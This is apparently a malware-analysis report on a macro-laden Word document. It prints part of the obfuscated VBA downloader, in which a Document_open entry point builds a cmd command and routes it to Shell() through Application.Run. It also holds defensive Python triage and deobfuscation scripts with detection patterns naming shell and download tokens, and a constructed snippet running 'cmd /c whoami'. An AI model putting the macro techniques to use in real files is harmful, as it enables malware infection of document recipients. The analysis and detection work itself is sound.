Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 57320de2b60d84bf…

MALICIOUS

Office (OLE)

Size: 169.2 KB
Created: 2018-07-17 22:09:00
Authoring application: Microsoft Office Word
First seen: 2018-07-23
MD5: 8cc4b64db9b4d5a60287772bd872b15e
SHA-1: 46ba56ad313880a4df451192d079671dfbbec129
SHA-256: 57320de2b60d84bff2d0878d1f2d60ef012620a44fca86df7483a8cdd6f0c800
Risk Score: 222

Malware Insights

MITRE ATT&CK
T1059 Command and Scripting Interpreter
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a malicious Word document carrying VBA macros. Three heuristics describe the execution chain: OLE_VBA_DOCOPEN flags the Document_Open entry point (visible in the extracted source as Private Sub Document_open()), OLE_VBA_SHELL flags a Shell() call somewhere in the macro code, and OLE_VBA_PCODE_AUTOEXEC_EXEC finds the same auto-execution and execution tokens in the compiled p-code stream, so the behaviour is detectable even if the source stream is stripped or fails to decode. In the visible Document_open body the macro builds a command string by concatenating fragments returned by helper functions (the TnBGsZ fragment, once its Chr() arguments are resolved, reads md /c foR ; /^f , " d, the tail of a cmd /c for /f construct with cmd delimiter and caret obfuscation) and passes it by name to another procedure via Application.Run("OuQiPLdb", ...); that indirection keeps the Shell() sink out of the entry-point routine. The pattern is the usual macro downloader: execute an arbitrary command line, most likely to fetch and run a secondary payload. The ClamAV signature Doc.Malware.Valyria-6991411-0 corroborates the verdict. The blocks of arithmetic on undeclared variables that fill every module are dead padding; they only run without an error because each routine starts with On Error Resume Next.

Heuristics 6

  • ClamAV: Doc.Malware.Valyria-6991411-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6991411-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    This particular URL is the DrawingML XML namespace identifier that Office writes into any document containing drawing parts; it is never contacted at runtime and should not be treated as an indicator of compromise.
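The OLE_VBA_PCODE_AUTOEXEC_EXEC and OLE_VBA_SHELL heuristics pair an auto-execution entry point with execution tokens. As an added example that is not part of this report or of the engine that produced it, the following Python applies the same pairing at the source level to a trimmed excerpt of the decoded macro shown later in this report, and adds two cheap obfuscation signals a triage script should also report: an On Error Resume Next prologue and write-only junk variables. The engine's own heuristic runs over the compiled p-code stream, which this script does not parse; the token lists, the AUTOEXEC_EXEC label and the second, constructed VBA snippet are this example's own.

```python
import re

# Excerpt of the decoded macro source shown in this report (module fQPFtmur),
# trimmed to a few representative lines; the Application.Run line is shortened.
SAMPLE_VBA = '''Function lCdpPSqztvXmY()
   fHBoJ = 87183 + Cmmbu + cWmwr / UwOQL + (4862 / ZVGkNu * jCkhEj * kzrCnX - 55560 + 39654 + JavQB - 33593)
   qmiTiw = 3785 + hUiam + rHIjw / OXfCF + (98858 / JSdYRl * rSFjGD * iGCwuj - 8762 + 66608 + HSSucT - 14040)
End Function
Private Sub Document_open()
On Error Resume Next
   DoRLwT = 59825 - jDCmW / 24875 * itUBq * (wfCSz / wqoimQ + IFMnh / BnmRX + RbBID - 85374 + EQEJPs / ciiuV)
zzVXwsSiC = Application.Run("OuQiPLdb", "" + EUVFmjp + NiRfPvil + CVar("c") + LDEwzujtTIrw + TnBGsZ)
End Sub
'''

# Constructed snippet (not from the sample) with a visible Shell() call, to show
# what an OLE_VBA_SHELL-style hit looks like when the source is not indirected.
CONSTRUCTED_VBA = '''Sub AutoOpen()
    Set o = CreateObject("WScript.Shell")
    Shell "cmd /c whoami", 0
End Sub
'''

# Entry points Office runs without a click, and tokens that execute, download
# or instantiate objects. Both lists are this example's own, not the engine's.
AUTOEXEC = re.compile(
    r'\b(?:AutoOpen|Auto_Open|AutoExec|AutoClose|Document_Open|Document_Close|Workbook_Open)\b',
    re.I)
EXEC_TOKENS = re.compile(
    r'\b(?:WScript\.Shell|Shell|ShellExecute|CreateObject|GetObject|Application\.Run'
    r'|URLDownloadToFile|XMLHTTP|PowerShell|cmd(?:\.exe)?)\b',
    re.I)
ASSIGN = re.compile(r'^\s*(\w+)\s*=', re.M)


def find_tokens(pattern, src):
    """Lower-cased, de-duplicated, sorted matches of pattern in src."""
    return sorted({m.group(0).lower() for m in pattern.finditer(src)})


def dead_assignments(src):
    """Names assigned once and never referenced again: the junk arithmetic this
    family uses to pad modules and dilute string-based signatures."""
    return [name for name in ASSIGN.findall(src)
            if len(re.findall(r'\b%s\b' % re.escape(name), src)) == 1]


def triage(src):
    """Source-level analogue of the report's auto-exec + execution pairing."""
    autoexec = find_tokens(AUTOEXEC, src)
    execs = find_tokens(EXEC_TOKENS, src)
    if autoexec and execs:
        verdict = 'AUTOEXEC_EXEC'      # auto-run entry point plus an execution token
    elif execs:
        verdict = 'SUSPICIOUS'         # execution token without an obvious trigger
    else:
        verdict = 'NONE'
    return {
        'autoexec': autoexec,
        'exec': execs,
        'error_suppression': bool(re.search(r'^\s*On Error Resume Next\b', src, re.M | re.I)),
        'dead_assignments': dead_assignments(src),
        'verdict': verdict,
    }


if __name__ == '__main__':
    for label, src in (('sample excerpt', SAMPLE_VBA), ('constructed', CONSTRUCTED_VBA)):
        print(label, triage(src))
```

On the excerpt the only execution token is Application.Run, which is exactly why a source-only scan underreports this sample: the Shell() call lives in the procedure invoked by name, and the p-code heuristic in the report catches it because it sees every module's compiled tokens at once.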

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  32245 bytes
             SHA-256: 12c00f635c66c1ab62d1a50fa5d029e3b472cdb992bd53d81e5d70d9000cc0d5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "fQPFtmur"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function lCdpPSqztvXmY()
   fHBoJ = 87183 + Cmmbu + cWmwr / UwOQL + (4862 / ZVGkNu * jCkhEj * kzrCnX - 55560 + 39654 + JavQB - 33593)
   lzUVqP = SmtFVK - oJAwz / sWAGZ / vwjllO + 2887 - GvFqt - 95511 - MkwQZF
   OsBfY = PFRah - OwbpOa / CpiLO / SFYCS + 89198 - RacYWf - 8015 - LAjwU
   GPBuK = lifhn - FzqDz / qXnWCT / VwrpCM + 89389 - vzJAY - 68701 - fswqj
   fwsFD = MpsNZC - dujjRc / KPtaf / GwqRY + 20889 - RaFzYC - 13555 - FqrIki
   qmiTiw = 3785 + hUiam + rHIjw / OXfCF + (98858 / JSdYRl * rSFjGD * iGCwuj - 8762 + 66608 + HSSucT - 14040)
   RUwjRi = jjMiKo - tscUs / KwhCb / TsvZMk + 25608 - fXsWv - 31650 - LPwRN
End Function
Private Sub Document_open()
On Error Resume Next
   DoRLwT = 59825 - jDCmW / 24875 * itUBq * (wfCSz / wqoimQ + IFMnh / BnmRX + RbBID - 85374 + EQEJPs / ciiuV)
   mjNpT = 30150 - MMuDoN / 86278 * KXptR * (zCEUwq / ZYTMsB + XbUAbG / iXilvn + CLtiw - 62418 + jJVVZn / obrwMB)
   rwGqL = 72615 - uUBWGj / 5116 * kDDqWz * (FLHJOW / FhjkC + CaDCkf / SDwSV + JbKiz - 2232 + LruiC / ciOUm)
   VNnwIf = 58069 - zAYYL / 12800 * WXUQXn * (sOvok / wRMAM + KjfLj / cTPWI + lwhtO - 43589 + MnEUYB / uMOhn)
zzVXwsSiC = Application.Run("OuQiPLdb", "" + EUVFmjp + NiRfPvil + CVar("c") + LDEwzujtTIrw + OWjnzFTPlrv + TnBGsZ + wdsuFjZz + jRNTPpUVTs + oMjbQGbuR + hRBNHvY + VYZJH + pFKpsGCUju + XzPASs + cqqofcb + zMiJtjPiMY + tjwMhUS + UfUAofFwH + rJfLGKh + rwRiRlmjh + iKAAFriN + powNpuCmj)
   LjUANC = 76237 - iLzrJ / 51223 * KirJi * (ojtNaO / TRAlnZ + dfzro / JTBrzn + YkYuZM - 72066 + zamnn / kQKLDj)
End Sub
Function GZlqElFtz()
   kvijEH = 68196 - pVPvr / 73792 * XswPn * (ATkndR / dAvCuV + ZkRLW / wtfqq + PQUrEB - 67228 + kbwtbq / kpaNBW)
   oQQwVS = 81860 - JZzRX / 56485 * GCfVq * (TOYkwq / IFqnT + UjqML / UWNBL + NXtHf - 25153 + BGVCrO / bisDj)
   lwDMn = 3439 - vFvtpi / 14054 * JFJzX * (JncbmE / NMvBD + qkKjrJ / njnLD + AGKhZ - 22024 + WbLak / zNhsz)
   sKsIK = 64347 - qsqmXV / 32044 * iUkfNO * (cDaFoo / kWAoKU + zVhTaM / hwfMz + bjNvi - 20966 + ioiEso / HTmjL)
   nbntiz = 13254 - tziCZI / 16971 * ALjlwm * (jjLOE / doYwb + QRIAod / EwtnUb + jMqpir - 2660 + DMXlC / QIKDzb)
   ozmtQ = 66761 - TLwwSQ / 46442 * UbFka * (iMzsk / qPubLi + pZPTV / lzTQI + VSwQi - 77154 + iBFlm / jskDR)
End Function
Function iAVjoUfBQmc()
   mjSIjd = 61233 - zjnhkj / 7287 * RSFWXr * (bEEwta / fdrlBo + aMAwX / XMIOd + rlWFBI - 90988 + qDcfmC / DKqwf)
   AqYrNj = 92296 - MMZXmr / 37676 * LBBnf * (zrhGAE / MrYznz + NYBnF / GzIwGs + TYFvs - 1874 + rhKGj / HzVBYz)
   BnzOh = 75565 - CiiAH / 81103 * omcGm * (JjNvGO / GcGaGB + RkFjLN / pwbFZ + ALiZR - 24867 + JVZDI / CQZcI)
   upDjv = 90151 - YUilq / 64564 * kuthI * (lmwKBY / LmPWTL + GLICd / orpmn + aGRVj - 90126 + zVIss / XCNmEM)
   UaUdXz = 54829 - mLXSUo / 91024 * wuMRis * (KvCGs / CbQVo + uJZCz / mKwwVi + ArmPP - 37797 + bSJiV / khjkGz)
   EmNtX = 24484 - minOz / 18551 * BNZOQu * (wQZtP / dBUMi + pQjjB / oBmls + ZbVdD - 51120 + MiwHWo / IwqkJb)
   rGFYAc = 38604 - vpURi / 14171 * XpcFz * (WkUMU / UBSQw + wtQzc / TUaHm + UTzum - 2143 + ZQjUW / MfRzOd)
   tGLboA = 58851 - NEAvY / 6108 * jtDjlF * (tEczBU / WALjA + EzbvC / ZRwUo + RnVWi - 86232 + izMHzq / KjqDpL)
End Function


Attribute VB_Name = "JTQqUOV"
Function TnBGsZ()
On Error Resume Next
UFZwKw = 8213 - 31240 * (htTpKl / 67806 * vGHnDS * EVGCHz - (99860 - aNzLi + 26993 / fSzjT))
   CnEdji = (2332 * UsWwv / KhkGFs - REKid / NRBwS - piCkkG)
XYUlTLc = CStr(Chr(QIodlZJHlAXY + noLhGwzbTvVaE + 109 + PGuwNzaahs + RUdTuEORSD)) + "d /" + CStr(Chr(ThopsIKV + WtccfrMOdpFa + 99 + qcaVqnEL + djKkiZhfTjwj)) + " fo" + "R  " + "; /" + "^" + "f" + " " + " , " + CStr(Chr(ZWEEatEtw + QiofRjKWrwwhcf + 34 + ZGCIHlHw + zlijjhclSrsA)) + " d"
WjnQor = 73798 - 21474 * (KRTPK / 33778 * iAtoo * DQsUhW - (85444 - DjCEJo + 77178 / BfMfz))
   itTqpz = 455
... (truncated)
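The string-building line in TnBGsZ above is typical of this sample: every Chr() argument is a sum of undeclared variables around a single real number, and the assembled command is chopped into short literals. As an added example that is not part of this report, the following Python resolves those expressions the way the VBA runtime does (an undeclared name is Empty, which is 0 in arithmetic) and then strips the cmd.exe delimiter and caret obfuscation from the result. The excerpt is copied from the preview above; calls to other helper functions such as TnBGsZ are not resolved (their bodies are not available here) and are treated as empty, so the script recovers literal fragments, not the fully assembled command.

```python
import re

# Body of Function TnBGsZ() exactly as it appears in the macro preview above
# (module JTQqUOV).
TNBGSZ_EXCERPT = '''Function TnBGsZ()
On Error Resume Next
UFZwKw = 8213 - 31240 * (htTpKl / 67806 * vGHnDS * EVGCHz - (99860 - aNzLi + 26993 / fSzjT))
   CnEdji = (2332 * UsWwv / KhkGFs - REKid / NRBwS - piCkkG)
XYUlTLc = CStr(Chr(QIodlZJHlAXY + noLhGwzbTvVaE + 109 + PGuwNzaahs + RUdTuEORSD)) + "d /" + CStr(Chr(ThopsIKV + WtccfrMOdpFa + 99 + qcaVqnEL + djKkiZhfTjwj)) + " fo" + "R  " + "; /" + "^" + "f" + " " + " , " + CStr(Chr(ZWEEatEtw + QiofRjKWrwwhcf + 34 + ZGCIHlHw + zlijjhclSrsA)) + " d"
WjnQor = 73798 - 21474 * (KRTPK / 33778 * iAtoo * DQsUhW - (85444 - DjCEJo + 77178 / BfMfz))
   itTqpz = 455
'''

TOKEN = re.compile(r'''
      CStr\(Chr\((?P<chr1>[^()]*)\)\)    # CStr(Chr(<arithmetic>))
    | Chr\((?P<chr2>[^()]*)\)            # bare Chr(<arithmetic>)
    | CVar\("(?P<cvar>[^"]*)"\)          # CVar("literal")
    | "(?P<lit>(?:[^"]|"")*)"            # string literal; "" is an escaped quote
    | (?P<ident>[A-Za-z_]\w*)            # bare identifier: undeclared, so Empty
    | (?P<op>[+&])                       # concatenation operators
    | (?P<ws>\s+)
''', re.VERBOSE)

SAFE_ARITH = re.compile(r'^[\d\s()+\-*/.]+$')


def vba_arith(expr):
    """Evaluate a VBA arithmetic expression as the macro's runtime does: undeclared
    variables are Empty (0). Returns None where VBA would raise, e.g. division by
    zero, which On Error Resume Next silently skips."""
    zeroed = re.sub(r'[A-Za-z_]\w*', '0', expr)
    if not SAFE_ARITH.match(zeroed) or '**' in zeroed:
        return None                      # only digits and + - * / ( ) reach eval()
    try:
        return int(round(eval(zeroed, {'__builtins__': {}}, {})))
    except (ZeroDivisionError, SyntaxError, ValueError, TypeError, OverflowError):
        return None


def build_string(rhs):
    """Concatenate the string-producing tokens of an assignment's right-hand side.
    Raises ValueError if the expression is not a pure string builder."""
    out, pos, produced = [], 0, False
    while pos < len(rhs):
        m = TOKEN.match(rhs, pos)
        if not m:
            raise ValueError('not a string builder: %r' % rhs[pos:pos + 30])
        pos = m.end()
        expr = m.group('chr1') if m.group('chr1') is not None else m.group('chr2')
        if expr is not None:
            code = vba_arith(expr)
            ok = code is not None and 0 <= code < 0x110000
            out.append(chr(code) if ok else '?')   # '?' marks an unresolved Chr()
            produced = True
        elif m.group('lit') is not None:
            out.append(m.group('lit').replace('""', '"'))
            produced = True
        elif m.group('cvar') is not None:
            out.append(m.group('cvar'))
            produced = True
        # identifiers contribute "" (Empty); operators and whitespace are skipped
    if not produced:
        raise ValueError('no string tokens')
    return ''.join(out)


def decode_string_builders(src):
    """Map variable name -> decoded string for every assignment whose right-hand
    side is built from Chr()/literal fragments; junk arithmetic is skipped."""
    decoded = {}
    for line in src.splitlines():
        name, sep, rhs = line.partition('=')
        if not sep or not rhs.strip():
            continue
        try:
            decoded[name.strip()] = build_string(rhs.strip())
        except ValueError:
            continue
    return decoded


def normalize_cmd(fragment):
    """Undo cmd.exe-level obfuscation: '^' is cmd's escape character and does
    nothing before a plain letter, and ';' and ',' are argument delimiters, so all
    three collapse to whitespace; cmd is case-insensitive, so lower-case for matching."""
    unescaped = fragment.replace('^', '')
    return ' '.join(re.sub(r'[;,]', ' ', unescaped).split()).lower()


if __name__ == '__main__':
    for name, value in decode_string_builders(TNBGSZ_EXCERPT).items():
        print(name, repr(value), '->', repr(normalize_cmd(value)))
```

Run stand-alone it reports XYUlTLc as md /c foR  ; /^f  , " d, which normalizes to md /c for /f " d: the opening of a for /f loop whose options string follows the quote. The Document_open line above concatenates this with CVar("c") and the return values of a dozen other helpers, so the full command line only exists at runtime; for a complete reconstruction, run the decoded module under a VBA emulator or step it in the Office VBA debugger with the Application.Run target replaced by a MsgBox.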